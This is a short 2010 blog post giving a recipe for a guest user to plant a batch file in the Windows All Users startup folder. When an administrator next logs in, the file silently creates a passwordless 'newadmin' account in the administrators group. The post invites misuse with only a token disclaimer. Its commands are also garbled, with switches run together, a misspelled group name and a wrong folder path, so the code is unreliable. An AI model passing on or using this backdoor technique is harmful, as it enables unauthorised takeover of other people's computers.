Sunday, April 25, 2010

UsInG gUeSt, CrEaTe aN AdMiN aCcOuNt

Please do not misuse it...................
STEP(1):- open notepad copy and paste the following code into it and save the file as admin.bat(you can actually give it any name,just make sure that the extension is .bat.
@echo off
net user newadmin/add/expires:never/passwordseq:no
net localgroup"adminstrators"/add newadmin
STEP(2):-Copy the file to the startup folder Here is the path to the startup folder....
C:/dOCOUMENTS AND SETTINGS/ALL USERS/START MENU PROGRAMS/SETUP
The next time the admin logs into the computer,the batch file runs and the admin account is created. once the admin logs off,you can logs into using the username NEWADMIN And wthout any password... enjoy frnds Ramesh Kumar(SIET CSE)

No comments:

Post a Comment